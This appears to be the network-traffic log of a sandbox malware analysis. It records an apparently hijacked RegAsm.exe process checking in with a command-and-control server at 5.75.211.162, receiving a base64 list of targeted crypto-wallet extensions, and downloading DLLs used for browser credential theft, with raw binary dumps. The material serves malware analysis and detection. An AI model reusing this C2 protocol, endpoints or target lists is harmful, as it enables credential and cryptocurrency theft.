2024-09-26 23:49:17 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:18 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:18 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------HDBKJEGIEBFHCAAKKEBAContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------HDBKJEGIEBFHCAAKKEBAContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------HDBKJEGIEBFHCAAKKEBACont
2024-09-26 23:49:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:19 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49716	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:19 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBGCAKFHCFHJKECFIID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6761 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:19 UTC	6761	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 43 41 4b 46 48 43 46 48 4a 4b 45 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 43 41 4b 46 48 43 46 48 4a 4b 45 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 43 41 4b 46 48 43 46 48 4a 4b 45 43 46 49 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------KFBGCAKFHCFHJKECFIIDContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------KFBGCAKFHCFHJKECFIIDContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------KFBGCAKFHCFHJKECFIIDCont
2024-09-26 23:49:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:20 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49717	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:21 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:21 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:21 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:49:21 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:49:21 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 23:49:21 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49718	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:23 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:23 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------KJDAECAEBKJJJKEBKKJDCont
2024-09-26 23:49:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:24 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49719	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:25 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:25 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------HJEBGHIEBFIJKECBKFHDCont
2024-09-26 23:49:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:25 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49720	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:26 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:26 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------ECBGIEHDBAAFIDGDAAAACont
2024-09-26 23:49:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49721	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:27 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
